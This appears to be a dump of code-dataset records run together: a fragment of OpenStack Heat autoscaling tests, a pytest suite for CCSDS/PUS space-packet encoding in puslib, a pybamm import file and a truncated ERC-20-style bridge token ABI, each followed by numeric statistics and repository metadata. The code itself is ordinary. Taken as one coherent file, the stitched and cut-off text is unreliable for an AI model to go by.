    """When DesiredCapacity is set it overrides MinSize for sizing."""
    t = template_format.parse(as_template)
    stack = utils.parse_stack(t, params=self.params)
    defn = rsrc_defn.ResourceDefinition(
        'asg', 'AWS::AutoScaling::AutoScalingGroup',
        {'MinSize': 2, 'MaxSize': 5, 'DesiredCapacity': 3,
         'LaunchConfigurationName': 'foo'})
    rsrc = asc.AutoScalingGroup('asg', defn, stack)
    rsrc._create_template = mock.Mock(return_value='tpl')
    self.assertEqual('tpl', rsrc.child_template())
    # DesiredCapacity (3) wins over MinSize (2).
    rsrc._create_template.assert_called_once_with(3)
def test_launch_config_get_ref_by_id(self):
    """FnGetRefId returns the physical name while the resource has an id,
    and falls back to the logical name once the id is cleared.
    """
    t = template_format.parse(as_template)
    stack = utils.parse_stack(t, params=self.params)
    rsrc = stack['LaunchConfig']
    self.stub_ImageConstraint_validate()
    self.assertIsNone(rsrc.validate())
    scheduler.TaskRunner(rsrc.create)()
    self.assertEqual((rsrc.CREATE, rsrc.COMPLETE), rsrc.state)
    # use physical_resource_name when rsrc.id is not None
    self.assertIsNotNone(rsrc.id)
    # Physical name format: <stack>-<resource>-<short id>.
    expected = '%s-%s-%s' % (rsrc.stack.name,
                             rsrc.name,
                             short_id.get_id(rsrc.id))
    self.assertEqual(expected, rsrc.FnGetRefId())
    # otherwise use parent method
    rsrc.id = None
    self.assertIsNone(rsrc.resource_id)
    self.assertEqual('LaunchConfig', rsrc.FnGetRefId())
def test_validate_BlockDeviceMappings_without_Ebs_property(self):
    """A BlockDeviceMappings entry without an Ebs sub-property is rejected."""
    t = template_format.parse(as_template)
    lcp = t['Resources']['LaunchConfig']['Properties']
    bdm = [{'DeviceName': 'vdb'}]
    lcp['BlockDeviceMappings'] = bdm
    stack = utils.parse_stack(t, params=self.params)
    self.stub_ImageConstraint_validate()
    self.m.ReplayAll()
    e = self.assertRaises(exception.StackValidationFailed,
                          self.create_scaling_group, t,
                          stack, 'LaunchConfig')
    self.assertIn("Ebs is missing, this is required",
                  six.text_type(e))
    self.m.VerifyAll()
def test_validate_BlockDeviceMappings_without_SnapshotId_property(self):
    """An Ebs mapping without a SnapshotId is rejected at validation."""
    t = template_format.parse(as_template)
    lcp = t['Resources']['LaunchConfig']['Properties']
    bdm = [{'DeviceName': 'vdb',
            'Ebs': {'VolumeSize': '1'}}]
    lcp['BlockDeviceMappings'] = bdm
    stack = utils.parse_stack(t, params=self.params)
    self.stub_ImageConstraint_validate()
    self.m.ReplayAll()
    e = self.assertRaises(exception.StackValidationFailed,
                          self.create_scaling_group, t,
                          stack, 'LaunchConfig')
    self.assertIn("SnapshotId is missing, this is required",
                  six.text_type(e))
    self.m.VerifyAll()
def test_validate_BlockDeviceMappings_without_DeviceName_property(self):
    """A mapping without DeviceName fails property validation."""
    t = template_format.parse(as_template)
    lcp = t['Resources']['LaunchConfig']['Properties']
    bdm = [{'Ebs': {'SnapshotId': '1234',
                    'VolumeSize': '1'}}]
    lcp['BlockDeviceMappings'] = bdm
    stack = utils.parse_stack(t, params=self.params)
    self.stub_ImageConstraint_validate()
    self.m.ReplayAll()
    e = self.assertRaises(exception.StackValidationFailed,
                          self.create_scaling_group, t,
                          stack, 'LaunchConfig')
    # Nested property-error message produced by the properties framework.
    excepted_error = ('Property error : LaunchConfig: BlockDeviceMappings '
                      'Property error : BlockDeviceMappings: 0 Property '
                      'error : 0: Property DeviceName not assigned')
    self.assertIn(excepted_error, six.text_type(e))
    self.m.VerifyAll()
class TestInstanceGroup(HeatTestCase):
    """Unit tests for InstanceGroup child-stack helpers."""

    # Template parameters shared by every test in this class.
    params = {'KeyName': 'test', 'ImageId': 'foo'}

    def setUp(self):
        super(TestInstanceGroup, self).setUp()
        t = template_format.parse(as_template)
        stack = utils.parse_stack(t, params=self.params)
        defn = rsrc_defn.ResourceDefinition('ig', 'OS::Heat::InstanceGroup',
                                            {'Size': 2,
                                             'LaunchConfigurationName': 'foo'})
        self.instance_group = asc.InstanceGroup('ig', defn, stack)

    def test_child_template(self):
        # Size (2) is passed through to the generated nested template.
        self.instance_group._create_template = mock.Mock(return_value='tpl')
        self.assertEqual('tpl', self.instance_group.child_template())
        self.instance_group._create_template.assert_called_once_with(2)

    def test_child_params(self):
        # child_params simply delegates to the internal _environment helper.
        self.instance_group._environment = mock.Mock(return_value='env')
        self.assertEqual('env', self.instance_group.child_params())
| 38.807892
| 79
| 0.610725
| 8,013
| 74,744
| 5.494072
| 0.060402
| 0.039615
| 0.027667
| 0.030892
| 0.830547
| 0.7997
| 0.77192
| 0.746888
| 0.718222
| 0.6916
| 0
| 0.011761
| 0.276517
| 74,744
| 1,925
| 80
| 38.828052
| 0.802352
| 0.065985
| 0
| 0.728261
| 0
| 0
| 0.138275
| 0.025428
| 0
| 0
| 0
| 0
| 0.103261
| 1
| 0.042799
| false
| 0
| 0.014266
| 0
| 0.063859
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a030cdea5ef1df06d8231cb018eaa65e7c91b2d1
| 12,860
|
py
|
Python
|
tests/test_packet.py
|
pxntus/puslib
|
2613d03e3efb1e26c4c016a91aaa81834cfff043
|
[
"MIT"
] | 4
|
2022-02-14T14:05:19.000Z
|
2022-03-14T00:00:37.000Z
|
tests/test_packet.py
|
pxntus/puslib
|
2613d03e3efb1e26c4c016a91aaa81834cfff043
|
[
"MIT"
] | null | null | null |
tests/test_packet.py
|
pxntus/puslib
|
2613d03e3efb1e26c4c016a91aaa81834cfff043
|
[
"MIT"
] | 1
|
2022-02-20T21:47:33.000Z
|
2022-02-20T21:47:33.000Z
|
from collections import namedtuple
import pytest
from puslib.packet import CcsdsSpacePacket
from puslib.packet import PusTcPacket
from puslib.packet import PusTmPacket
from puslib.packet import PacketType
from puslib.packet import AckFlag
from puslib.time import CucTime
# Fixture values shared by the CCSDS/PUS packet tests below.
APID = 0x10
SEQ_COUNT_OR_NAME = 0x50
PUS_SERVICE = 8
PUS_SUBSERVICE = 1
TC_SOURCE = 0x2021
DATA = bytes.fromhex('DEADBEEF')
# A None field means "omit that argument so the library default applies".
CcsdsPacketArgs = namedtuple('CcsdsPacketArgs', ['packet_version_number', 'packet_type', 'secondary_header_flag', 'apid', 'seq_flags', 'seq_count_or_name', 'data', 'has_pec'])
@pytest.mark.parametrize("args", [
    CcsdsPacketArgs(None, PacketType.TC, None, APID, None, SEQ_COUNT_OR_NAME, b'', True),
    CcsdsPacketArgs(None, PacketType.TC, None, APID, None, SEQ_COUNT_OR_NAME, b'', False),
    CcsdsPacketArgs(0, PacketType.TM, True, APID, 0b11, SEQ_COUNT_OR_NAME, DATA, True),
    CcsdsPacketArgs(0, PacketType.TM, False, APID, 0b11, SEQ_COUNT_OR_NAME, DATA, False),
])
def test_create_ccsds_packet(args):
    """Create a CCSDS space packet and verify the primary-header fields.

    None fields in the fixture are omitted from the create() call so the
    library default applies; for those only the explicitly supplied fields
    are checked.
    """
    args_to_pass = {k: v for k, v in args._asdict().items() if v is not None}
    packet = CcsdsSpacePacket.create(**args_to_pass)
    # BUG FIX: the original assertions were written as
    #     assert x == y if cond else default
    # which parses as `assert ((x == y) if cond else default)`, so whenever
    # the fixture value was falsy (None, 0, False) the assert checked the
    # constant `default` and verified nothing.  Assert explicitly, and only
    # for values that were actually supplied to create().
    if args.packet_version_number is not None:
        assert packet.header.packet_version_number == args.packet_version_number
    assert packet.header.packet_type == args.packet_type
    assert packet.packet_type == args.packet_type
    if args.secondary_header_flag is not None:
        assert packet.header.secondary_header_flag == args.secondary_header_flag
    assert packet.header.apid == args.apid
    assert packet.apid == args.apid
    if args.seq_flags is not None:
        assert packet.header.seq_flags == args.seq_flags
    assert packet.header.seq_count_or_name == args.seq_count_or_name
    assert packet.payload == args.data
    # 6-byte CCSDS primary header + payload + optional 2-byte PEC.
    assert len(packet) == 6 + (len(args.data) if args.data else 0) + (2 if args.has_pec else 0)
# A None field means "omit that argument from PusTcPacket.create()".
TcPacketArgs = namedtuple('TcPacketArgs', ['apid', 'name', 'pus_version', 'ack_flags', 'service_type', 'service_subtype', 'source', 'data', 'has_pec'])
@pytest.mark.parametrize("args", [
    TcPacketArgs(APID, SEQ_COUNT_OR_NAME, 1, AckFlag.ACCEPTANCE, PUS_SERVICE, PUS_SUBSERVICE, None, None, True),
    TcPacketArgs(APID, SEQ_COUNT_OR_NAME, 2, AckFlag.ACCEPTANCE, PUS_SERVICE, PUS_SUBSERVICE, TC_SOURCE, None, True),
    TcPacketArgs(APID, SEQ_COUNT_OR_NAME, 2, AckFlag.ACCEPTANCE | AckFlag.COMPLETION, PUS_SERVICE, PUS_SUBSERVICE, TC_SOURCE, DATA, True),
])
def test_tc_packet_create(args):
    """Creating a PUS TC packet stores the secondary-header fields."""
    supplied = {field: value for field, value in args._asdict().items()
                if value is not None}
    packet = PusTcPacket.create(**supplied)
    header = packet.secondary_header
    assert packet.name == args.name
    assert header.pus_version == args.pus_version
    assert header.ack_flags == args.ack_flags
    assert header.service_type == args.service_type
    assert header.service_subtype == args.service_subtype
    assert header.source == args.source
@pytest.mark.parametrize("args, length", [
    (TcPacketArgs(APID, SEQ_COUNT_OR_NAME, None, AckFlag.ACCEPTANCE, PUS_SERVICE, PUS_SUBSERVICE, None, None, False), 9),
    (TcPacketArgs(APID, SEQ_COUNT_OR_NAME, None, AckFlag.ACCEPTANCE, PUS_SERVICE, PUS_SUBSERVICE, None, b'', True), 11),
    (TcPacketArgs(APID, SEQ_COUNT_OR_NAME, None, AckFlag.ACCEPTANCE, PUS_SERVICE, PUS_SUBSERVICE, TC_SOURCE, b'', False), 11),
    (TcPacketArgs(APID, SEQ_COUNT_OR_NAME, None, AckFlag.ACCEPTANCE, PUS_SERVICE, PUS_SUBSERVICE, TC_SOURCE, b'', True), 13),
    (TcPacketArgs(APID, SEQ_COUNT_OR_NAME, None, AckFlag.ACCEPTANCE, PUS_SERVICE, PUS_SUBSERVICE, TC_SOURCE, DATA, False), 15),
    (TcPacketArgs(APID, SEQ_COUNT_OR_NAME, None, AckFlag.ACCEPTANCE, PUS_SERVICE, PUS_SUBSERVICE, TC_SOURCE, DATA, True), 17),
])
def test_tc_packet_length(args, length):
    """TC packet size tracks the optional source field, app data and PEC."""
    supplied = {field: value for field, value in args._asdict().items()
                if value is not None}
    assert len(PusTcPacket.create(**supplied)) == length
@pytest.mark.parametrize("args, binary", [
    (TcPacketArgs(APID, SEQ_COUNT_OR_NAME, None, AckFlag.ACCEPTANCE, PUS_SERVICE, PUS_SUBSERVICE, None, b'', False), bytes.fromhex('1810c0500002210801')),
    (TcPacketArgs(APID, SEQ_COUNT_OR_NAME, None, AckFlag.ACCEPTANCE, PUS_SERVICE, PUS_SUBSERVICE, None, b'', True), bytes.fromhex('1810c0500004210801bbc9')),
    (TcPacketArgs(APID, SEQ_COUNT_OR_NAME, None, AckFlag.ACCEPTANCE, PUS_SERVICE, PUS_SUBSERVICE, TC_SOURCE, b'', False), bytes.fromhex('1810c05000042108012021')),
    (TcPacketArgs(APID, SEQ_COUNT_OR_NAME, None, AckFlag.ACCEPTANCE, PUS_SERVICE, PUS_SUBSERVICE, TC_SOURCE, b'', True), bytes.fromhex('1810c050000621080120213377')),
    (TcPacketArgs(APID, SEQ_COUNT_OR_NAME, None, AckFlag.ACCEPTANCE, PUS_SERVICE, PUS_SUBSERVICE, TC_SOURCE, DATA, False), bytes.fromhex('1810c05000082108012021deadbeef')),
    (TcPacketArgs(APID, SEQ_COUNT_OR_NAME, None, AckFlag.ACCEPTANCE, PUS_SERVICE, PUS_SUBSERVICE, TC_SOURCE, DATA, True), bytes.fromhex('1810c050000a2108012021deadbeefc984')),
])
def test_tc_packet_serialize(args, binary):
    """Serializing a TC packet reproduces the reference encoding exactly."""
    supplied = {field: value for field, value in args._asdict().items()
                if value is not None}
    packet = PusTcPacket.create(**supplied)
    encoded = packet.serialize()
    # len(packet) must agree with the actual serialized size.
    assert len(packet) == len(encoded)
    assert len(encoded) == len(binary)
    assert encoded == binary
    # bytes(packet) is an alternative spelling of serialize().
    assert bytes(packet) == binary
@pytest.mark.parametrize("args, binary", [
    (TcPacketArgs(APID, SEQ_COUNT_OR_NAME, None, AckFlag.ACCEPTANCE, PUS_SERVICE, PUS_SUBSERVICE, None, b'', False), bytes.fromhex('1810c0500002210801')),
    (TcPacketArgs(APID, SEQ_COUNT_OR_NAME, None, AckFlag.ACCEPTANCE, PUS_SERVICE, PUS_SUBSERVICE, None, b'', True), bytes.fromhex('1810c0500004210801bbc9')),
    (TcPacketArgs(APID, SEQ_COUNT_OR_NAME, None, AckFlag.ACCEPTANCE, PUS_SERVICE, PUS_SUBSERVICE, TC_SOURCE, b'', False), bytes.fromhex('1810c05000042108012021')),
    (TcPacketArgs(APID, SEQ_COUNT_OR_NAME, None, AckFlag.ACCEPTANCE, PUS_SERVICE, PUS_SUBSERVICE, TC_SOURCE, b'', True), bytes.fromhex('1810c050000621080120213377')),
    (TcPacketArgs(APID, SEQ_COUNT_OR_NAME, None, AckFlag.ACCEPTANCE, PUS_SERVICE, PUS_SUBSERVICE, TC_SOURCE, DATA, False), bytes.fromhex('1810c05000082108012021deadbeef')),
    (TcPacketArgs(APID, SEQ_COUNT_OR_NAME, None, AckFlag.ACCEPTANCE, PUS_SERVICE, PUS_SUBSERVICE, TC_SOURCE, DATA, True), bytes.fromhex('1810c050000a2108012021deadbeefc984')),
])
def test_tc_packet_deserialize(args, binary):
    """Deserializing reference TC bytes recovers every field and round-trips."""
    # Idiom: bool(x) replaces the redundant `True if x else False` ternaries.
    _, packet = PusTcPacket.deserialize(binary,
                                        has_source_field=bool(args.source),
                                        has_pec=bool(args.has_pec))
    assert packet.apid == args.apid
    assert packet.name == args.name
    # All fixtures leave pus_version as None; these encodings carry version 2.
    assert packet.secondary_header.pus_version == (args.pus_version if args.pus_version else 2)
    assert packet.secondary_header.ack_flags == args.ack_flags
    assert packet.service == args.service_type
    assert packet.subservice == args.service_subtype
    assert packet.source == args.source
    assert packet.app_data == args.data
    assert packet.has_pec == args.has_pec
    # Round-trip: re-serializing must reproduce the input buffer exactly.
    buffer = packet.serialize()
    assert len(buffer) == len(binary)
    assert buffer == binary
# TM-specific fixture values.  NOTE: PUS_SERVICE, PUS_SUBSERVICE and DATA are
# deliberately rebound here, shadowing the TC values defined earlier in the
# module; every test below this point uses the TM values.
PUS_SERVICE = 130
PUS_SUBSERVICE = 4
MSG_TYPE_COUNTER = 0x1314
TM_DESTINATION = 0x2021
TIME = CucTime(100, 10000, 4, 2)
DATA = bytes.fromhex('DEADBEEF')
# A None field means "omit that argument from PusTmPacket.create()".
TmPacketArgs = namedtuple('TmPacketArgs', ['apid', 'seq_count', 'pus_version', 'spacecraft_time_ref_status', 'service_type', 'service_subtype', 'msg_type_counter', 'destination', 'time', 'data', 'has_pec'])
@pytest.mark.parametrize("args", [
    TmPacketArgs(APID, SEQ_COUNT_OR_NAME, 1, None, PUS_SERVICE, PUS_SUBSERVICE, None, None, TIME, b'', True),
    TmPacketArgs(APID, SEQ_COUNT_OR_NAME, 2, 1, PUS_SERVICE, PUS_SUBSERVICE, MSG_TYPE_COUNTER, TM_DESTINATION, TIME, DATA, True),
])
def test_tm_packet_create(args):
    """Creating a PUS TM packet stores the secondary-header fields."""
    supplied = {field: value for field, value in args._asdict().items()
                if value is not None}
    packet = PusTmPacket.create(**supplied)
    header = packet.secondary_header
    assert packet.seq_count == args.seq_count
    assert header.pus_version == args.pus_version
    # When omitted, the spacecraft time reference status defaults to 0.
    assert header.spacecraft_time_ref_status == (args.spacecraft_time_ref_status or 0)
    assert header.service_type == args.service_type
    assert header.service_subtype == args.service_subtype
    assert header.msg_type_counter == args.msg_type_counter
    assert header.destination == args.destination
    assert header.time == args.time
    assert packet.source_data == args.data
@pytest.mark.parametrize("args, length", [
    (TmPacketArgs(APID, SEQ_COUNT_OR_NAME, None, None, PUS_SERVICE, PUS_SUBSERVICE, None, None, TIME, None, False), 16),
    (TmPacketArgs(APID, SEQ_COUNT_OR_NAME, None, None, PUS_SERVICE, PUS_SUBSERVICE, MSG_TYPE_COUNTER, None, TIME, None, False), 18),
    (TmPacketArgs(APID, SEQ_COUNT_OR_NAME, None, None, PUS_SERVICE, PUS_SUBSERVICE, MSG_TYPE_COUNTER, TM_DESTINATION, TIME, None, False), 20),
    (TmPacketArgs(APID, SEQ_COUNT_OR_NAME, None, None, PUS_SERVICE, PUS_SUBSERVICE, MSG_TYPE_COUNTER, TM_DESTINATION, TIME, DATA, False), 24),
    (TmPacketArgs(APID, SEQ_COUNT_OR_NAME, None, None, PUS_SERVICE, PUS_SUBSERVICE, MSG_TYPE_COUNTER, TM_DESTINATION, TIME, DATA, True), 26),
])
def test_tm_packet_length(args, length):
    """TM packet size tracks the optional counter, destination, data and PEC."""
    supplied = {field: value for field, value in args._asdict().items()
                if value is not None}
    assert len(PusTmPacket.create(**supplied)) == length
@pytest.mark.parametrize("args, binary", [
    (TmPacketArgs(APID, SEQ_COUNT_OR_NAME, None, None, PUS_SERVICE, PUS_SUBSERVICE, None, None, TIME, None, False), bytes.fromhex('0810c0500009208204') + bytes(TIME)),
    (TmPacketArgs(APID, SEQ_COUNT_OR_NAME, None, None, PUS_SERVICE, PUS_SUBSERVICE, MSG_TYPE_COUNTER, None, TIME, None, False), bytes.fromhex('0810c050000b2082041314') + bytes(TIME)),
    (TmPacketArgs(APID, SEQ_COUNT_OR_NAME, None, 1, PUS_SERVICE, PUS_SUBSERVICE, MSG_TYPE_COUNTER, TM_DESTINATION, TIME, None, False), bytes.fromhex('0810c050000d21820413142021') + bytes(TIME)),
    (TmPacketArgs(APID, SEQ_COUNT_OR_NAME, None, 1, PUS_SERVICE, PUS_SUBSERVICE, MSG_TYPE_COUNTER, TM_DESTINATION, TIME, DATA, False), bytes.fromhex('0810c050001121820413142021') + bytes(TIME) + DATA),
    (TmPacketArgs(APID, SEQ_COUNT_OR_NAME, None, 1, PUS_SERVICE, PUS_SUBSERVICE, MSG_TYPE_COUNTER, TM_DESTINATION, TIME, DATA, True), bytes.fromhex('0810c050001321820413142021') + bytes(TIME) + DATA + bytes.fromhex('0483')),
])
def test_tm_packet_serialize(args, binary):
    """Serializing a TM packet reproduces the reference encoding exactly."""
    supplied = {field: value for field, value in args._asdict().items()
                if value is not None}
    packet = PusTmPacket.create(**supplied)
    encoded = packet.serialize()
    # len(packet) must agree with the actual serialized size.
    assert len(packet) == len(encoded)
    assert len(encoded) == len(binary)
    assert encoded == binary
    # bytes(packet) is an alternative spelling of serialize().
    assert bytes(packet) == binary
@pytest.mark.parametrize("args, binary", [
    (TmPacketArgs(APID, SEQ_COUNT_OR_NAME, None, None, PUS_SERVICE, PUS_SUBSERVICE, None, None, TIME, b'', False), bytes.fromhex('0810c0500009208204') + bytes(TIME)),
    (TmPacketArgs(APID, SEQ_COUNT_OR_NAME, None, None, PUS_SERVICE, PUS_SUBSERVICE, MSG_TYPE_COUNTER, None, TIME, b'', False), bytes.fromhex('0810c050000b2082041314') + bytes(TIME)),
    (TmPacketArgs(APID, SEQ_COUNT_OR_NAME, None, 1, PUS_SERVICE, PUS_SUBSERVICE, MSG_TYPE_COUNTER, TM_DESTINATION, TIME, b'', False), bytes.fromhex('0810c050000d21820413142021') + bytes(TIME)),
    (TmPacketArgs(APID, SEQ_COUNT_OR_NAME, None, 1, PUS_SERVICE, PUS_SUBSERVICE, MSG_TYPE_COUNTER, TM_DESTINATION, TIME, DATA, False), bytes.fromhex('0810c050001121820413142021') + bytes(TIME) + DATA),
    (TmPacketArgs(APID, SEQ_COUNT_OR_NAME, None, 1, PUS_SERVICE, PUS_SUBSERVICE, MSG_TYPE_COUNTER, TM_DESTINATION, TIME, DATA, True), bytes.fromhex('0810c050001321820413142021') + bytes(TIME) + DATA + bytes.fromhex('0483')),
])
def test_tm_packet_deserialize(args, binary):
    """Deserializing reference TM bytes recovers every field and round-trips."""
    # Idiom: bool(x) replaces the redundant `True if x else False` ternaries;
    # the call is split across lines instead of one 220-character line.
    _, packet = PusTmPacket.deserialize(binary,
                                        has_type_counter_field=bool(args.msg_type_counter),
                                        has_destination_field=bool(args.destination),
                                        cuc_time=TIME,
                                        has_pec=bool(args.has_pec))
    assert packet.apid == args.apid
    assert packet.seq_count == args.seq_count
    # All fixtures leave pus_version as None; these encodings carry version 2.
    assert packet.secondary_header.pus_version == (args.pus_version if args.pus_version else 2)
    assert packet.secondary_header.spacecraft_time_ref_status == (args.spacecraft_time_ref_status if args.spacecraft_time_ref_status else 0)
    assert packet.service == args.service_type
    assert packet.subservice == args.service_subtype
    assert packet.counter == args.msg_type_counter
    assert packet.destination == args.destination
    assert packet.time == args.time
    assert packet.source_data == args.data
    assert packet.has_pec == args.has_pec
    # Round-trip: re-serializing must reproduce the input buffer exactly.
    buffer = packet.serialize()
    assert len(buffer) == len(binary)
    assert buffer == binary
| 63.039216
| 227
| 0.757387
| 1,767
| 12,860
| 5.246746
| 0.068478
| 0.044008
| 0.049617
| 0.069464
| 0.825693
| 0.800345
| 0.787186
| 0.75062
| 0.737892
| 0.725704
| 0
| 0.050599
| 0.124028
| 12,860
| 203
| 228
| 63.349754
| 0.772392
| 0
| 0
| 0.549708
| 0
| 0
| 0.075583
| 0.04168
| 0
| 0
| 0.002022
| 0
| 0.345029
| 1
| 0.052632
| false
| 0.081871
| 0.046784
| 0
| 0.099415
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
13fbe8487de335f7102881b9e1d006dd1d370dd4
| 103
|
py
|
Python
|
pybamm/models/submodels/transport_efficiency/__init__.py
|
dion-w/PyBaMM
|
aeb9bcc82bb5dc3fba4fa045c4cad9d2d41b6359
|
[
"BSD-3-Clause"
] | 1
|
2022-03-24T01:23:16.000Z
|
2022-03-24T01:23:16.000Z
|
pybamm/models/submodels/transport_efficiency/__init__.py
|
sxwangxiang/PyBaMM
|
23157aebce218444edc83b525dfb2c7fc8637598
|
[
"BSD-3-Clause"
] | null | null | null |
pybamm/models/submodels/transport_efficiency/__init__.py
|
sxwangxiang/PyBaMM
|
23157aebce218444edc83b525dfb2c7fc8637598
|
[
"BSD-3-Clause"
] | null | null | null |
from .base_transport_efficiency import BaseModel
from .bruggeman_transport_efficiency import Bruggeman
| 34.333333
| 53
| 0.902913
| 12
| 103
| 7.416667
| 0.583333
| 0.426966
| 0.561798
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.07767
| 103
| 2
| 54
| 51.5
| 0.936842
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
cd5eb21232223b11472ad84e1a66109da9bc1139
| 7,114
|
py
|
Python
|
utils/abi/dai_abi.py
|
Polar-DANO/polarbot
|
c1a0c03e3ca0b9925397cad62ab0117bf9483216
|
[
"MIT"
] | null | null | null |
utils/abi/dai_abi.py
|
Polar-DANO/polarbot
|
c1a0c03e3ca0b9925397cad62ab0117bf9483216
|
[
"MIT"
] | null | null | null |
utils/abi/dai_abi.py
|
Polar-DANO/polarbot
|
c1a0c03e3ca0b9925397cad62ab0117bf9483216
|
[
"MIT"
] | null | null | null |
abi = [{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":False,"inputs":[{"indexed":False,"internalType":"uint256","name":"chainId","type":"uint256"}],"name":"AddSupportedChainId","type":"event"},{"anonymous":False,"inputs":[{"indexed":False,"internalType":"address","name":"contractAddress","type":"address"},{"indexed":False,"internalType":"uint256","name":"supplyIncrement","type":"uint256"}],"name":"AddSwapToken","type":"event"},{"anonymous":False,"inputs":[{"indexed":True,"internalType":"address","name":"owner","type":"address"},{"indexed":True,"internalType":"address","name":"spender","type":"address"},{"indexed":False,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":False,"inputs":[{"indexed":False,"internalType":"address","name":"newBridgeRoleAddress","type":"address"}],"name":"MigrateBridgeRole","type":"event"},{"anonymous":False,"inputs":[{"indexed":False,"internalType":"address","name":"to","type":"address"},{"indexed":False,"internalType":"uint256","name":"amount","type":"uint256"},{"indexed":False,"internalType":"address","name":"feeAddress","type":"address"},{"indexed":False,"internalType":"uint256","name":"feeAmount","type":"uint256"},{"indexed":False,"internalType":"bytes32","name":"originTxId","type":"bytes32"}],"name":"Mint","type":"event"},{"anonymous":False,"inputs":[{"indexed":False,"internalType":"address","name":"contractAddress","type":"address"},{"indexed":False,"internalType":"uint256","name":"supplyDecrement","type":"uint256"}],"name":"RemoveSwapToken","type":"event"},{"anonymous":False,"inputs":[{"indexed":False,"internalType":"address","name":"token","type":"address"},{"indexed":False,"internalType":"uint256","name":"amount","type":"uint256"}],"name":"Swap","type":"event"},{"anonymous":False,"inputs":[{"indexed":True,"internalType":"address","name":"from","type":"address"},{"indexed":True,"internalType":"address","name":"to","type":"address"},{"indexed":Fa
lse,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":False,"inputs":[{"indexed":False,"internalType":"uint256","name":"amount","type":"uint256"},{"indexed":False,"internalType":"uint256","name":"chainId","type":"uint256"}],"name":"Unwrap","type":"event"},{"inputs":[{"internalType":"uint256","name":"chainId","type":"uint256"}],"name":"addSupportedChainId","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"contractAddress","type":"address"},{"internalType":"uint256","name":"supplyIncrement","type":"uint256"}],"name":"addSwapToken","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burnFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"chainIds","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"
name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newBridgeRoleAddress","type":"address"}],"name":"migrateBridgeRole","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"},{"internalType":"address","name":"feeAddress","type":"address"},{"internalType":"uint256","name":"feeAmount","type":"uint256"},{"internalType":"bytes32","name":"originTxId","type":"bytes32"}],"name":"mint","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"contractAddress","type":"address"},{"internalType":"uint256","name":"supplyDecrement","type":"uint256"}],"name":"removeSwapToken","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"token","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"swap","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"token","type":"address"}],"name":"swapSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutabili
